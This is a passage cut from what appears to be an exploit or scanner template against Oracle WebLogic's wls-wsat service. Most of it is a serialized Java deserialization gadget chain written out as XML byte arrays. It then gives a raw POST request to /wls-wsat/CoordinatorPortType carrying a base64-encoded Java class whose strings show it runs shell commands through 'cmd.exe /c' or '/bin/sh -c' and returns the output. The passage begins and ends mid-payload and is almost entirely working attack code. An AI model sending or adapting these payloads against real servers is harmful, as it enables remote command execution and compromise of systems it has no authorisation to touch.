index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAA